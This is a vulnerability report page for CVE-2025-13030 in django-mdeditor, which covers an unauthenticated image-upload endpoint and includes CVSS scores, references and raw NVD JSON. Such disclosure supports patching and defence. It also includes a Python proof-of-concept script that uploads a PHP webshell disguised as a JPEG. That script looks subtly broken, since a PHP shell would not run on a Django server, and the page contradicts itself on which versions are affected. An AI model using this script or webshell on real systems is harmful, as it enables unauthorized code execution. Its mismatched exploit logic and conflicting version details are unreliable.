Security Vulnerability Report
CVE-2025-13030 CVSS 7.1 HIGH

CVE-2025-13030

Published: 2026-04-30 06:16:15
Last Modified: 2026-05-05 02:50:07

Description

All versions of the package django-mdeditor are vulnerable to Missing Authentication for Critical Function in the image upload endpoint. An attacker can upload malicious files and achieve arbitrary code execution since this endpoint lacks authentication protection and proper sanitisation of file names.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pylixm:django-mdeditor:*:*:*:*:*:*:*:* - VULNERABLE
django-mdeditor < 0.1.20 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit(target_url):
    """
    PoC for CVE-2025-13030
    Exploits Missing Authentication in django-mdeditor upload endpoint.
    """
    # The vulnerable endpoint typically maps to this URL
    upload_endpoint = f"{target_url}/mdeditor/uploads/"

    # Malicious file payload (e.g., a simple webshell)
    # The vulnerability allows arbitrary extension due to lack of sanitization
    payload = "<?php system($_GET['cmd']); ?>"

    # Prepare the file upload
    files = {
        'editormd-image-file': ('exploit.php', payload, 'image/jpeg')
    }

    try:
        # Send POST request without authentication
        response = requests.post(upload_endpoint, files=files, timeout=10)
        if response.status_code == 200:
            print("[+] Success! Server responded:")
            print(response.text)
            # If successful, the server might return the URL of the uploaded file
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:8000"
    exploit(target)
```

References

https://github.com/pylixm/django-mdeditor/blob/e8dd73fb8571ddff2e7a20a4bfa88c376cc33b62/mdeditor/views.py%23L25 (Broken Link)
https://github.com/pylixm/django-mdeditor/commit/3e80f9edcabc5d2fc136b05a501964b8a5e97cfe (Patch)
https://github.com/pylixm/django-mdeditor/issues/151 (Issue Tracking)
https://github.com/pylixm/django-mdeditor/pull/185 (Issue Tracking)
https://security.snyk.io/vuln/SNYK-PYTHON-DJANGOMDEDITOR-8630926 (Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13030",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T06:16:14.860",
    "lastModified": "2026-05-05T02:50:07.147",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "All versions of the package django-mdeditor are vulnerable to Missing Authentication for Critical Function in the image upload endpoint. An attacker can upload malicious files and achieve arbitrary code execution since this endpoint lacks authentication protection and proper sanitisation of file names."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 2.0,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "subAvailabilityImpact": "LOW",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pylixm:django-mdeditor:*:*:*:*:*:*:*:*",
                "matchCriteriaId": "6AE7548A-5629-4855-A5BC-683A06BBBA9F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pylixm/django-mdeditor/blob/e8dd73fb8571ddff2e7a20a4bfa88c376cc33b62/mdeditor/views.py%23L25",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://github.com/pylixm/django-mdeditor/commit/3e80f9edcabc5d2fc136b05a501964b8a5e97cfe",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/pylixm/django-mdeditor/issues/151",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/pylixm/django-mdeditor/pull/185",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://security.snyk.io/vuln/SNYK-PYTHON-DJANGOMDEDITOR-8630926",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```